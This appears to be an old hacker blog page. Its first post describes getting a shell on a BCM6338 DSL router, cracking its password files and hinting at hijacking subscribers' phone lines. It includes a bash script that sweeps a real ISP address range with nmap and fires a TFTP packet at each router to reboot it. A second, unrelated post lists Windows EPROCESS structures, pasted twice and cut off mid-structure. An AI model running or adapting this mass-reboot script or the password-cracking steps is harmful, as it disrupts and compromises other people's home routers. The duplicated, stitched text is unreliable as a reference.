1 10 121 17 2 205 211 212 216 219 220 222 226 274 278 286 3 339 340 341 35 4 5 6 7 8 9 buddyinfo bus cmdline cpuinfo devices diskstats driver execdomains filesystems fs interrupts iomem ioports irq kcore kmsg loadavg locks meminfo misc modules mounts mtd net partitions self slabinfo stat sys sysvipc tty uptime var version vmstat
# cat cpuinfo
system type : 96338L-2M-8M
processor : 0
cpu model : BCM6338 V1.0
BogoMIPS : 235.52
wait instruction : no
microsecond timers : yes
tlb_entries : 32
extra interrupt vector : yes
hardware watchpoint : no
VCED exceptions : not available
VCEI exceptions : not available
#
hmmmmmmm ........
# cat meminfo
MemTotal: 6164 kB
MemFree: 520 kB
Buffers: 80 kB
Cached: 1144 kB
SwapCached: 0 kB
Active: 2172 kB
Inactive: 112 kB
HighTotal: 0 kB
HighFree: 0 kB
LowTotal: 6164 kB
LowFree: 520 kB
SwapTotal: 0 kB
SwapFree: 0 kB
Dirty: 0 kB
Writeback: 0 kB
Mapped: 2036 kB
Slab: 2104 kB
Committed_AS: 2916 kB
PageTables: 304 kB
VmallocTotal: 1048560 kB
VmallocUsed: 688 kB
VmallocChunk: 1047836 kB
#
man this box is such a bottleneck ... :(( [may be this is why my net is always so slow :p]
# cat /etc/issue
cat: /etc/issue: No such file or directory
#
hmmmmmm.... it doesn't ...what to do ....
# cat /proc/version
Linux version 2.6.8.1 (root@localhost.localdomain) (gcc version 3.4.2) #1 Fri Dec 23 09:56:55 CST 2005
#
hmmm .............
gcc :)) well i think i can have phun ..... :)) =)) >:) \:D/ <:-p
# gcc
gcc: not found
# cc
cc: not found
#
:(( guess not .... :(( shit ..f*** a$$h**** ... now what fun is linux without gcc ...
may be that's the reason they had ...2 make us not have phun :P ...well fu** them ... we will still have phun .... :D
121 admin 176 S pvc2684d
205 admin 212 S dhcpd
211 admin 280 S syslogd -C -l 7
212 admin 540 S telnetd
216 admin 148 S bftpd
219 admin 180 S tftpd
220 admin 648 S httpd
222 admin 216 S klogd
226 admin 332 S pppd -c 1.32.1 -r airtel -i nas_1_32 -u 040XXXXXX <--- (X)
274 admin 196 S /bin/dnsprobe
278 admin 268 S upnp -L br0 -W ppp_1_32_1 -D
339 admin 600 S telnetd
340 admin 264 S sh -c sh
341 admin 308 S sh
355 admin 248 R ps -xa
(X) == UR PHONE NUMBER (040400XXXXX)
NOW ...
the servers running on the box are of interest .........
httpd, tftpd, bftpd, telnetd.....
now what ....
well we will start fuzzing .....these daemons.... lets see what's the output ...
[I will just give and example with tftpd... an source of a client is attached with it+ a simple tiny miny winnie script which scans the Class B network and reboots the boxes :-P )
........ [this is how u can have fun ...ppl who know the VA process know what to do next ]
Hey check out /etc directory .....
few cool files there ... like passwd, default.cfg ....etc etc ...
default.cfg has base64 encoded password which is used when the box is RSTed....
and passwd file can be cracked open by john in 1 min ...
try those ....
check out all those files which might give some info about the boxx ... now that's Hacking :)
ok ... now something NICE ... ok naa ????
now what is this ...
226 admin 332 S pppd -c 1.32.1 -r airtel -i nas_1_32 -u 040XXXXXX
well u tell me :)
now its a daemon which is using ur phone number ... [:o why so ]
WHO Knows ... I am not going to give u anymore answers... OTHERWISE I will be JAILED[:o hooooaaa ...wtf ...yes ...Since there are LAWs In INDIA now ... ;)
but what if ...i cange the phone number .... what can i get :-P
who knows ... may be u can hijack phones or may be u can get the same speed of that user to whom the phone belongs .... who knows ...
if u want to find out ..please go ahead .... do iton ur own ...
I wish u best of luck ....and happy hacking :D
===== CODE =====
#!/bin/bash
var0=1
LIMIT=255
var1=1
while [ "$var1" -lt "$LIMIT" ]
do
var1=`expr $var1 + 1`
state=`nmap -sP -T Insane 122.169.$var1.1 | grep up | cut -d '(' -f2 | cut -d '.' -f1-3 | grep hosts | cut -d ' ' -f1 | wc -l`
if [ $state -eq 0 ]
then
echo -ne "Sending Packet to $1.$var1 Network Segment\n"
while [ "$var0" -lt "$LIMIT" ]
do
var0=`expr $var0 + 1` # var0=$(($var0+1)) also works.
# var0=$((var0 + 1)) also works.
# let "var0 += 1" also works.
if [ $var0 -ne 159 ] #159 is my ipaddr so to not boot mine
then
./tftp $1.$var1.$var0 69 S a > /dev/null 2>&1 &
fi
done # Various other methods also work.
sleep 5s
fi
done
echo
exit 0
===== END of CODE ======
./tftp == STANDARD TFTP CLIENT
Saturday, April 7, 2007
_EPROCESS structure for Xp, 2003 , 2000 and NT
typedef struct _EPROCESS_NT4
{
KPROCESS_NT4 Pcb;
NTSTATUS ExitStatus;
KEVENT LockEvent;
ULONG LockCount;
LARGE_INTEGER CreateTime;
LARGE_INTEGER ExitTime;
PKTHREAD_NT4 LockOwner;
ULONG UniqueProcessId;
LIST_ENTRY ActiveProcessLinks;
ULONGLONG QuotaPeakPoolUsage;
ULONGLONG QuotaPoolUsage;
ULONG PagefileUsage;
ULONG CommitCharge;
ULONG PeakPagefileUsage;
ULONG PeakVirtualSize;
ULONGLONG VirtualSize;
MMSUPPORT_NT4 Vm;
ULONG LastProtoPteFault;
ULONG DebugPort;
ULONG ExceptionPort;
PHANDLE_TABLE ObjectTable;
PACCESS_TOKEN Token;
FAST_MUTEX WorkingSetLock;
ULONG WorkingSetPage;
BOOLEAN ProcessOutswapEnabled;
BOOLEAN ProcessOutswapped;
BOOLEAN AddressSpaceInitialized;
BOOLEAN AddressSpaceDeleted;
FAST_MUTEX AddressCreationLock;
KSPIN_LOCK HyperSpaceLock;
PETHREAD_NT4 ForkInProgress;
USHORT VmOperation;
BOOLEAN ForkWasSuccessful;
UCHAR MmAgressiveWsTrimMask;
PKEVENT VmOperationEvent;
HARDWARE_PTE PageDirectoryPte;
ULONG LastFaultCount;
ULONG ModifiedPageCount;
PVOID VadRoot;
PVOID VadHint;
ULONG CloneRoot;
ULONG NumberOfPrivatePages;
ULONG NumberOfLockedPages;
USHORT NextPageColor;
BOOLEAN ExitProcessCalled;
BOOLEAN CreateProcessReported;
HANDLE SectionHandle;
PPEB Peb;
PVOID SectionBaseAddress;
PEPROCESS_QUOTA_BLOCK QuotaBlock;
NTSTATUS LastThreadExitStatus;
PPROCESS_WS_WATCH_INFORMATION WorkingSetWatch;
HANDLE Win32WindowStation;
HANDLE InheritedFromUniqueProcessId;
ACCESS_MASK GrantedAccess;
ULONG DefaultHardErrorProcessing;
PVOID LdtInformation;
PVOID VadFreeHint;
PVOID VdmObjects;
KMUTANT ProcessMutant;
UCHAR ImageFileName[16];
ULONG VmTrimFaultValue;
UCHAR SetTimerResolution;
UCHAR PriorityClass;
union
{
struct
{
UCHAR SubSystemMinorVersion;
UCHAR SubSystemMajorVersion;
};
USHORT SubSystemVersion;
};
PVOID Win32Process;
} EPROCESS_NT4, *PEPROCESS_NT4;
typedef struct _EPROCESS_W2K
{
KPROCESS_W2K Pcb;
NTSTATUS ExitStatus;
KEVENT LockEvent;
ULONG LockCount;
LARGE_INTEGER CreateTime;
LARGE_INTEGER ExitTime;
PKTHREAD_W2K LockOwner;
ULONG UniqueProcessId;
LIST_ENTRY ActiveProcessLinks;
ULONGLONG QuotaPeakPoolUsage;
ULONGLONG QuotaPoolUsage;
ULONG PagefileUsage;
ULONG CommitCharge;
ULONG PeakPagefileUsage;
ULONG PeakVirtualSize;
ULONGLONG VirtualSize;
MMSUPPORT_W2K Vm;
LIST_ENTRY SessionProcessLinks;
ULONG DebugPort;
ULONG ExceptionPort;
PHANDLE_TABLE ObjectTable;
PACCESS_TOKEN Token;
FAST_MUTEX WorkingSetLock;
ULONG WorkingSetPage;
BOOLEAN ProcessOutswapEnabled;
BOOLEAN ProcessOutswapped;
BOOLEAN AddressSpaceInitialized;
BOOLEAN AddressSpaceDeleted;
FAST_MUTEX AddressCreationLock;
KSPIN_LOCK HyperSpaceLock;
PETHREAD_W2K ForkInProgress;
USHORT VmOperation;
BOOLEAN ForkWasSuccessful;
UCHAR MmAgressiveWsTrimMask;
PKEVENT VmOperationEvent;
PVOID PaeTop;
ULONG LastFaultCount;
ULONG ModifiedPageCount;
PVOID VadRoot;
PVOID VadHint;
ULONG CloneRoot;
ULONG NumberOfPrivatePages;
ULONG NumberOfLockedPages;
USHORT NextPageColor;
BOOLEAN ExitProcessCalled;
BOOLEAN CreateProcessReported;
HANDLE SectionHandle;
PPEB Peb;
PVOID SectionBaseAddress;
PEPROCESS_QUOTA_BLOCK QuotaBlock;
NTSTATUS LastThreadExitStatus;
PPROCESS_WS_WATCH_INFORMATION WorkingSetWatch;
HANDLE Win32WindowStation;
HANDLE InheritedFromUniqueProcessId;
ACCESS_MASK GrantedAccess;
ULONG DefaultHardErrorProcessing;
PVOID LdtInformation;
PVOID VadFreeHint;
PVOID VdmObjects;
PDEVICE_MAP DeviceMap;
ULONG SessionId;
LIST_ENTRY PhysicalVadList;
HARDWARE_PTE PageDirectoryPte;
ULONG Filler;
ULONG PaePageDirectoryPage;
UCHAR ImageFileName[16];
ULONG VmTrimFaultValue;
UCHAR SetTimerResolution;
UCHAR PriorityClass;
union
{
struct
{
UCHAR SubSystemMinorVersion;
UCHAR SubSystemMajorVersion;
};
USHORT SubSystemVersion;
};
PVOID Win32Process;
PEJOB Job;
ULONG JobStatus;
LIST_ENTRY JobLinks;
PVOID LockedPageList;
PVOID SecurityPort;
PWOW64_PROCESS Wow64Process;
LARGE_INTEGER ReadOperationCount;
LARGE_INTEGER WriteOperationCount;
LARGE_INTEGER OtherOperationCount;
LARGE_INTEGER ReadTransferCount;
LARGE_INTEGER WriteTransferCount;
LARGE_INTEGER OtherTransferCount;
ULONG CommitChargeLimit;
ULONG CommitChargePeek;
LIST_ENTRY ThreadListHead;
PRTL_BITMAP VadPhysicalPagesBitMap;
ULONG VadPhysicalPages;
ULONG AweLock;
} EPROCESS_W2K, *PEPROCESS_W2K;
typedef struct _EPROCESS_XP
{
KPROCESS_XP Pcb;
EX_PUSH_LOCK ProcessLock;
LARGE_INTEGER CreateTime;
LARGE_INTEGER ExitTime;
EX_RUNDOWN_REF RundownProtect;
PVOID UniqueProcessId;
LIST_ENTRY ActiveProcessLinks;
ULONG QuotaUsage[3];
ULONG QuotaPeak[3];
ULONG CommitCharge;
ULONG PeakVirtualSize;
ULONG VirtualSize;
LIST_ENTRY SessionProcessLinks;
PVOID DebugPort;
PVOID ExceptionPort;
PHANDLE_TABLE ObjectTable;
EX_FAST_REF Token;
FAST_MUTEX WorkingSetLock;
ULONG WorkingSetPage;
FAST_MUTEX AddressCreationLock;
KSPIN_LOCK HyperSpaceLock;
PETHREAD_XP ForkInProgress;
ULONG HardwareTrigger;
PVOID VadRoot;
PVOID VadHint;
PVOID CloneRoot;
ULONG NumberOfPrivatePages;
ULONG NumberOfLockedPages;
PVOID Win32Process;
PEJOB Job;
PSECTION_OBJECT SectionObject;
PVOID SectionBaseAddress;
PEPROCESS_QUOTA_BLOCK QuotaBlock;
PPAGEFAULT_HISTORY WorkingSetWatch;
PVOID Win32WindowStation;
PVOID InheritedFromUniqueProcessId;
PVOID LdtInformation;
PVOID VadFreeHint;
PVOID VdmObjects;
PDEVICE_MAP DeviceMap;
LIST_ENTRY PhysicalVadList;
union
{
HARDWARE_PTE PageDirectoryPte;
ULONGLONG Filler;
};
PVOID Session;
UCHAR ImageFileName[16];
LIST_ENTRY JobLinks;
PVOID LockedPageList;
LIST_ENTRY ThreadListHead;
PVOID SecurityPort;
PVOID PaeTop;
ULONG ActiveThreads;
ULONG GrantedAccess;
ULONG DefaultHardErrorProcessing;
NTSTATUS LastThreadExitStatus;
PPEB Peb;
EX_FAST_REF PrefetchTrace;
LARGE_INTEGER ReadOperationCount;
LARGE_INTEGER WriteOperationCount;
LARGE_INTEGER OtherOperationCount;
LARGE_INTEGER ReadTransferCount;
LARGE_INTEGER WriteTransferCount;
LARGE_INTEGER OtherTransferCount;
ULONG CommitChargeLimit;
ULONG CommitChargePeek;
PVOID AweInfo;
SE_AUDIT_PROCESS_CREATION_INFO SeAuditProcessCreationInfo;
MMSUPPORT_XP Vm;
ULONG LastFaultCount;
ULONG ModifiedPageCount;
ULONG NumberOfVads;
ULONG JobStatus;
union
{
ULONG Flags;
struct
{
ULONG CreateReported : 1;
ULONG NoDebugInherit : 1;
ULONG ProcessExiting : 1;
ULONG ProcessDelete : 1;
ULONG Wow64SplitPages : 1;
ULONG VmDeleted : 1;
ULONG OutswapEnabled : 1;
ULONG Outswapped : 1;
ULONG ForkFailed : 1;
ULONG HasPhysicalVad : 1;
ULONG AddressSpaceInitialized : 2;
ULONG SetTimerResolution : 1;
ULONG BreakOnTermination : 1;
ULONG SessionCreationUnderway : 1;
ULONG WriteWatch : 1;
ULONG ProcessInSession : 1;
ULONG OverrideAddressSpace : 1;
ULONG HasAddressSpace : 1;
ULONG LaunchPrefetched : 1;
ULONG InjectInpageErrors : 1;
ULONG Unused : 11;
};
};
NTSTATUS ExitStatus;
USHORT NextPageColor;
union
{
struct
{
UCHAR SubSystemMinorVersion;
UCHAR SubSystemMajorVersion;
};
USHORT SubSystemVersion;
};
UCHAR PriorityClass;
BOOLEAN WorkingSetAcquiredUnsafe;
} EPROCESS_XP, *PEPROCESS_XP;
typedef struct _EPROCESS_2K3
{
/*+0x000*/ KPROCESS_2K3 Pcb;
/*+0x06c*/ EX_PUSH_LOCK ProcessLock;
/*+0x070*/ LARGE_INTEGER CreateTime;
/*+0x078*/ LARGE_INTEGER ExitTime;
/*+0x080*/ EX_RUNDOWN_REF RundownProtect;
/*+0x084*/ PVOID UniqueProcessId;
/*+0x088*/ LIST_ENTRY ActiveProcessLinks;
/*+0x090*/ ULONG QuotaUsage[3];
/*+0x09c*/ ULONG QuotaPeak[3];
/*+0x0a8*/ ULONG CommitCharge;
/*+0x0ac*/ ULONG PeakVirtualSize;
/*+0x0b0*/ ULONG VirtualSize;
/*+0x0b4*/ LIST_ENTRY SessionProcessLinks;
/*+0x0bc*/ PVOID DebugPort;
/*+0x0c0*/ PVOID ExceptionPort;
/*+0x0c4*/ PHANDLE_TABLE ObjectTable;
/*+0x0c8*/ EX_FAST_REF Token;
/*+0x0cc*/ ULONG WorkingSetPage;
/*+0x0d0*/ KGUARDED_MUTEX AddressCreationLock;
/*+0x0f0*/ KSPIN_LOCK HyperSpaceLock;
/*+0x0f4*/ PETHREAD_2K3 ForkInProgress;
/*+0x0f8*/ ULONG HardwareTrigger;
/*+0x0fc*/ PMM_AVL_TABLE PhysicalVadRoot;
/*+0x100*/ PVOID CloneRoot;
/*+0x104*/ ULONG NumberOfPrivatePages;
/*+0x108*/ ULONG NumberOfLockedPages;
/*+0x10c*/ PVOID Win32Process;
/*+0x110*/ PEJOB Job;
/*+0x114*/ PSECTION_OBJECT SectionObject;
/*+0x118*/ PVOID SectionBaseAddress;
/*+0x11c*/ PEPROCESS_QUOTA_BLOCK QuotaBlock;
/*+0x120*/ PPAGEFAULT_HISTORY WorkingSetWatch;
/*+0x124*/ PVOID Win32WindowStation;
/*+0x128*/ PVOID InheritedFromUniqueProcessId;
/*+0x12c*/ PVOID LdtInformation;
/*+0x130*/ PVOID VadFreeHint;
/*+0x134*/ PVOID VdmObjects;
/*+0x138*/ PVOID DeviceMap;
/*+0x13c*/ PVOID Spare0[3];
union {
/*+0x148*/HARDWARE_PTE PageDirectoryPte;
/*+0x148*/ULONGLONG Filler;
};
/*+0x150*/ PVOID Session;
/*+0x154*/ UCHAR ImageFileName[16];
/*+0x164*/ LIST_ENTRY JobLinks;
/*+0x16c*/ PVOID LockedPagesList;
/*+0x170*/ LIST_ENTRY ThreadListHead;
/*+0x178*/ PVOID SecurityPort;
/*+0x17c*/ PVOID PaeTop;
/*+0x180*/ ULONG ActiveThreads;
/*+0x184*/ ULONG GrantedAccess;
/*+0x188*/ ULONG DefaultHardErrorProcessing;
/*+0x18c*/ NTSTATUS LastThreadExitStatus;
/*+0x190*/ PPEB Peb;
/*+0x194*/ EX_FAST_REF PrefetchTrace;
/*+0x198*/ LARGE_INTEGER ReadOperationCount;
/*+0x1a0*/ LARGE_INTEGER WriteOperationCount;
/*+0x1a8*/ LARGE_INTEGER OtherOperationCount;
/*+0x1b0*/ LARGE_INTEGER ReadTransferCount;
/*+0x1b8*/ LARGE_INTEGER WriteTransferCount;
/*+0x1c0*/ LARGE_INTEGER OtherTransferCount;
/*+0x1c8*/ ULONG CommitChargeLimit;
/*+0x1cc*/ ULONG CommitChargePeak;
/*+0x1d0*/ PVOID AweInfo;
/*+0x1d4*/ SE_AUDIT_PROCESS_CREATION_INFO SeAuditProcessCreationInfo;
/*+0x1d8*/ MMSUPPORT_2K3 Vm;
/*+0x238*/ LIST_ENTRY MmProcessLinks;
/*+0x240*/ ULONG ModifiedPageCount;
/*+0x244*/ ULONG JobStatus;
union{
/*+0x248*/ ULONG Flags;
struct{
/*+0x248*/ ULONG CreateReported : 1;
/*+0x248*/ ULONG NoDebugInherit : 1;
/*+0x248*/ ULONG ProcessExiting : 1;
/*+0x248*/ ULONG ProcessDelete : 1;
/*+0x248*/ ULONG Wow64SplitPages : 1;
/*+0x248*/ ULONG VmDeleted : 1;
/*+0x248*/ ULONG OutswapEnabled : 1;
/*+0x248*/ ULONG Outswapped : 1;
/*+0x248*/ ULONG ForkFailed : 1;
/*+0x248*/ ULONG Wow64VaSpace4Gb : 1;
/*+0x248*/ ULONG AddressSpaceInitialized :2;
/*+0x248*/ ULONG SetTimerResolution : 1;
/*+0x248*/ ULONG BreakOnTermination : 1;
/*+0x248*/ ULONG SessionCreationUnderway :1;
/*+0x248*/ ULONG WriteWatch : 1;
/*+0x248*/ ULONG ProcessInSession : 1;
/*+0x248*/ ULONG OverrideAddressSpace : 1;
/*+0x248*/ ULONG HasAddressSpace : 1;
/*+0x248*/ ULONG LaunchPrefetched : 1;
/*+0x248*/ ULONG InjectInpageErrors : 1;
/*+0x248*/ ULONG VmTopDown : 1;
/*+0x248*/ ULONG ImageNotifyDone : 1;
/*+0x248*/ ULONG PdeUpdateNeeded : 1;
/*+0x248*/ ULONG VdmAllowed : 1;
/*+0x248*/ ULONG Unused : 7;
};
};
/*+0x24c*/ NTSTATUS ExitStatus;
/*+0x250*/ USHORT NextPageColor;
union {
struct {
/*+0x252*/ UCHAR SubSystemMinorVersion;
/*+0x253*/ UCHAR SubSystemMajorVersion;
};
/*+0x252*/ USHORT SubSystemVersion;
};
/*+0x254*/ UCHAR PriorityClass;
/*+0x258*/ MM_AVL_TABLE VadRoot;
} EPROCESS_2K3, *PEPROCESS_2K3;
{
KPROCESS_NT4 Pcb;
NTSTATUS ExitStatus;
KEVENT LockEvent;
ULONG LockCount;
LARGE_INTEGER CreateTime;
LARGE_INTEGER ExitTime;
PKTHREAD_NT4 LockOwner;
ULONG UniqueProcessId;
LIST_ENTRY ActiveProcessLinks;
ULONGLONG QuotaPeakPoolUsage;
ULONGLONG QuotaPoolUsage;
ULONG PagefileUsage;
ULONG CommitCharge;
ULONG PeakPagefileUsage;
ULONG PeakVirtualSize;
ULONGLONG VirtualSize;
MMSUPPORT_NT4 Vm;
ULONG LastProtoPteFault;
ULONG DebugPort;
ULONG ExceptionPort;
PHANDLE_TABLE ObjectTable;
PACCESS_TOKEN Token;
FAST_MUTEX WorkingSetLock;
ULONG WorkingSetPage;
BOOLEAN ProcessOutswapEnabled;
BOOLEAN ProcessOutswapped;
BOOLEAN AddressSpaceInitialized;
BOOLEAN AddressSpaceDeleted;
FAST_MUTEX AddressCreationLock;
KSPIN_LOCK HyperSpaceLock;
PETHREAD_NT4 ForkInProgress;
USHORT VmOperation;
BOOLEAN ForkWasSuccessful;
UCHAR MmAgressiveWsTrimMask;
PKEVENT VmOperationEvent;
HARDWARE_PTE PageDirectoryPte;
ULONG LastFaultCount;
ULONG ModifiedPageCount;
PVOID VadRoot;
PVOID VadHint;
ULONG CloneRoot;
ULONG NumberOfPrivatePages;
ULONG NumberOfLockedPages;
USHORT NextPageColor;
BOOLEAN ExitProcessCalled;
BOOLEAN CreateProcessReported;
HANDLE SectionHandle;
PPEB Peb;
PVOID SectionBaseAddress;
PEPROCESS_QUOTA_BLOCK QuotaBlock;
NTSTATUS LastThreadExitStatus;
PPROCESS_WS_WATCH_INFORMATION WorkingSetWatch;
HANDLE Win32WindowStation;
HANDLE InheritedFromUniqueProcessId;
ACCESS_MASK GrantedAccess;
ULONG DefaultHardErrorProcessing;
PVOID LdtInformation;
PVOID VadFreeHint;
PVOID VdmObjects;
KMUTANT ProcessMutant;
UCHAR ImageFileName[16];
ULONG VmTrimFaultValue;
UCHAR SetTimerResolution;
UCHAR PriorityClass;
union
{
struct
{
UCHAR SubSystemMinorVersion;
UCHAR SubSystemMajorVersion;
};
USHORT SubSystemVersion;
};
PVOID Win32Process;
} EPROCESS_NT4, *PEPROCESS_NT4;
typedef struct _EPROCESS_W2K
{
KPROCESS_W2K Pcb;
NTSTATUS ExitStatus;
KEVENT LockEvent;
ULONG LockCount;
LARGE_INTEGER CreateTime;
LARGE_INTEGER ExitTime;
PKTHREAD_W2K LockOwner;
ULONG UniqueProcessId;
LIST_ENTRY ActiveProcessLinks;
ULONGLONG QuotaPeakPoolUsage;
ULONGLONG QuotaPoolUsage;
ULONG PagefileUsage;
ULONG CommitCharge;
ULONG PeakPagefileUsage;
ULONG PeakVirtualSize;
ULONGLONG VirtualSize;
MMSUPPORT_W2K Vm;
LIST_ENTRY SessionProcessLinks;
ULONG DebugPort;
ULONG ExceptionPort;
PHANDLE_TABLE ObjectTable;
PACCESS_TOKEN Token;
FAST_MUTEX WorkingSetLock;
ULONG WorkingSetPage;
BOOLEAN ProcessOutswapEnabled;
BOOLEAN ProcessOutswapped;
BOOLEAN AddressSpaceInitialized;
BOOLEAN AddressSpaceDeleted;
FAST_MUTEX AddressCreationLock;
KSPIN_LOCK HyperSpaceLock;
PETHREAD_W2K ForkInProgress;
USHORT VmOperation;
BOOLEAN ForkWasSuccessful;
UCHAR MmAgressiveWsTrimMask;
PKEVENT VmOperationEvent;
PVOID PaeTop;
ULONG LastFaultCount;
ULONG ModifiedPageCount;
PVOID VadRoot;
PVOID VadHint;
ULONG CloneRoot;
ULONG NumberOfPrivatePages;
ULONG NumberOfLockedPages;
USHORT NextPageColor;
BOOLEAN ExitProcessCalled;
BOOLEAN CreateProcessReported;
HANDLE SectionHandle;
PPEB Peb;
PVOID SectionBaseAddress;
PEPROCESS_QUOTA_BLOCK QuotaBlock;
NTSTATUS LastThreadExitStatus;
PPROCESS_WS_WATCH_INFORMATION WorkingSetWatch;
HANDLE Win32WindowStation;
HANDLE InheritedFromUniqueProcessId;
ACCESS_MASK GrantedAccess;
ULONG DefaultHardErrorProcessing;
PVOID LdtInformation;
PVOID VadFreeHint;
PVOID VdmObjects;
PDEVICE_MAP DeviceMap;
ULONG SessionId;
LIST_ENTRY PhysicalVadList;
HARDWARE_PTE PageDirectoryPte;
ULONG Filler;
ULONG PaePageDirectoryPage;
UCHAR ImageFileName[16];
ULONG VmTrimFaultValue;
UCHAR SetTimerResolution;
UCHAR PriorityClass;
union
{
struct
{
UCHAR SubSystemMinorVersion;
UCHAR SubSystemMajorVersion;
};
USHORT SubSystemVersion;
};
PVOID Win32Process;
PEJOB Job;
ULONG JobStatus;
LIST_ENTRY JobLinks;
PVOID LockedPageList;
PVOID SecurityPort;
PWOW64_PROCESS Wow64Process;
LARGE_INTEGER ReadOperationCount;
LARGE_INTEGER WriteOperationCount;
LARGE_INTEGER OtherOperationCount;
LARGE_INTEGER ReadTransferCount;
LARGE_INTEGER WriteTransferCount;
LARGE_INTEGER OtherTransferCount;
ULONG CommitChargeLimit;
ULONG CommitChargePeek;
LIST_ENTRY ThreadListHead;
PRTL_BITMAP VadPhysicalPagesBitMap;
ULONG VadPhysicalPages;
ULONG AweLock;
} EPROCESS_W2K, *PEPROCESS_W2K;
typedef struct _EPROCESS_XP
{
KPROCESS_XP Pcb;
EX_PUSH_LOCK ProcessLock;
LARGE_INTEGER CreateTime;
LARGE_INTEGER ExitTime;
EX_RUNDOWN_REF RundownProtect;
PVOID UniqueProcessId;
LIST_ENTRY ActiveProcessLinks;
ULONG QuotaUsage[3];
ULONG QuotaPeak[3];
ULONG CommitCharge;
ULONG PeakVirtualSize;
ULONG VirtualSize;
LIST_ENTRY SessionProcessLinks;
PVOID DebugPort;
PVOID ExceptionPort;
PHANDLE_TABLE ObjectTable;
EX_FAST_REF Token;
FAST_MUTEX WorkingSetLock;
ULONG WorkingSetPage;
FAST_MUTEX AddressCreationLock;
KSPIN_LOCK HyperSpaceLock;
PETHREAD_XP ForkInProgress;
ULONG HardwareTrigger;
PVOID VadRoot;
PVOID VadHint;
PVOID CloneRoot;
ULONG NumberOfPrivatePages;
ULONG NumberOfLockedPages;
PVOID Win32Process;
PEJOB Job;
PSECTION_OBJECT SectionObject;
PVOID SectionBaseAddress;
PEPROCESS_QUOTA_BLOCK QuotaBlock;
PPAGEFAULT_HISTORY WorkingSetWatch;
PVOID Win32WindowStation;
PVOID InheritedFromUniqueProcessId;
PVOID LdtInformation;
PVOID VadFreeHint;
PVOID VdmObjects;
PDEVICE_MAP DeviceMap;
LIST_ENTRY PhysicalVadList;
union
{
HARDWARE_PTE PageDirectoryPte;
ULONGLONG Filler;
};
PVOID Session;
UCHAR ImageFileName[16];
LIST_ENTRY JobLinks;
PVOID LockedPageList;
LIST_ENTRY ThreadListHead;
PVOID SecurityPort;
PVOID PaeTop;
ULONG ActiveThreads;
ULONG GrantedAccess;
ULONG DefaultHardErrorProcessing;
NTSTATUS LastThreadExitStatus;
PPEB Peb;
EX_FAST_REF PrefetchTrace;
LARGE_INTEGER ReadOperationCount;
LARGE_INTEGER WriteOperationCount;
LARGE_INTEGER OtherOperationCount;
LARGE_INTEGER ReadTransferCount;
LARGE_INTEGER WriteTransferCount;
LARGE_INTEGER OtherTransferCount;
ULONG CommitChargeLimit;
ULONG CommitChargePeek;
PVOID AweInfo;
SE_AUDIT_PROCESS_CREATION_INFO SeAuditProcessCreationInfo;
MMSUPPORT_XP Vm;
ULONG LastFaultCount;
ULONG ModifiedPageCount;
ULONG NumberOfVads;
ULONG JobStatus;
union
{
ULONG Flags;
struct
{
ULONG CreateReported : 1;
ULONG NoDebugInherit : 1;
ULONG ProcessExiting : 1;
ULONG ProcessDelete : 1;
ULONG Wow64SplitPages : 1;
ULONG VmDeleted : 1;
ULONG OutswapEnabled : 1;
ULONG Outswapped : 1;
ULONG ForkFailed : 1;
ULONG HasPhysicalVad : 1;
ULONG AddressSpaceInitialized : 2;
ULONG SetTimerResolution : 1;
ULONG BreakOnTermination : 1;
ULONG SessionCreationUnderway : 1;
ULONG WriteWatch : 1;
ULONG ProcessInSession : 1;
ULONG OverrideAddressSpace : 1;
ULONG HasAddressSpace : 1;
ULONG LaunchPrefetched : 1;
ULONG InjectInpageErrors : 1;
ULONG Unused : 11;
};
};
NTSTATUS ExitStatus;
USHORT NextPageColor;
union
{
struct
{
UCHAR SubSystemMinorVersion;
UCHAR SubSystemMajorVersion;
};
USHORT SubSystemVersion;
};
UCHAR PriorityClass;
BOOLEAN WorkingSetAcquiredUnsafe;
} EPROCESS_XP, *PEPROCESS_XP;
typedef struct _EPROCESS_2K3
{
/*+0x000*/ KPROCESS_2K3 Pcb;
/*+0x06c*/ EX_PUSH_LOCK ProcessLock;
/*+0x070*/ LARGE_INTEGER CreateTime;
/*+0x078*/ LARGE_INTEGER ExitTime;
/*+0x080*/ EX_RUNDOWN_REF RundownProtect;
/*+0x084*/ PVOID UniqueProcessId;
/*+0x088*/ LIST_ENTRY ActiveProcessLinks;
/*+0x090*/ ULONG QuotaUsage[3];
/*+0x09c*/ ULONG QuotaPeak[3];
/*+0x0a8*/ ULONG CommitCharge;
/*+0x0ac*/ ULONG PeakVirtualSize;
/*+0x0b0*/ ULONG VirtualSize;
/*+0x0b4*/ LIST_ENTRY SessionProcessLinks;
/*+0x0bc*/ PVOID DebugPort;
/*+0x0c0*/ PVOID ExceptionPort;
/*+0x0c4*/ PHANDLE_TABLE ObjectTable;
/*+0x0c8*/ EX_FAST_REF Token;
/*+0x0cc*/ ULONG WorkingSetPage;
/*+0x0d0*/ KGUARDED_MUTEX AddressCreationLock;
/*+0x0f0*/ KSPIN_LOCK HyperSpaceLock;
/*+0x0f4*/ PETHREAD_2K3 ForkInProgress;
/*+0x0f8*/ ULONG HardwareTrigger;
/*+0x0fc*/ PMM_AVL_TABLE PhysicalVadRoot;
/*+0x100*/ PVOID CloneRoot;
/*+0x104*/ ULONG NumberOfPrivatePages;
/*+0x108*/ ULONG NumberOfLockedPages;
/*+0x10c*/ PVOID Win32Process;
/*+0x110*/ PEJOB Job;
/*+0x114*/ PSECTION_OBJECT SectionObject;
/*+0x118*/ PVOID SectionBaseAddress;
/*+0x11c*/ PEPROCESS_QUOTA_BLOCK QuotaBlock;
/*+0x120*/ PPAGEFAULT_HISTORY WorkingSetWatch;
/*+0x124*/ PVOID Win32WindowStation;
/*+0x128*/ PVOID InheritedFromUniqueProcessId;
/*+0x12c*/ PVOID LdtInformation;
/*+0x130*/ PVOID VadFreeHint;
/*+0x134*/ PVOID VdmObjects;
/*+0x138*/ PVOID DeviceMap;
/*+0x13c*/ PVOID Spare0[3];
union {
/*+0x148*/HARDWARE_PTE PageDirectoryPte;
/*+0x148*/ULONGLONG Filler;
};
/*+0x150*/ PVOID Session;
/*+0x154*/ UCHAR ImageFileName[16];
/*+0x164*/ LIST_ENTRY JobLinks;
/*+0x16c*/ PVOID LockedPagesList;
/*+0x170*/ LIST_ENTRY ThreadListHead;
/*+0x178*/ PVOID SecurityPort;
/*+0x17c*/ PVOID PaeTop;
/*+0x180*/ ULONG ActiveThreads;
/*+0x184*/ ULONG GrantedAccess;
/*+0x188*/ ULONG DefaultHardErrorProcessing;
/*+0x18c*/ NTSTATUS LastThreadExitStatus;
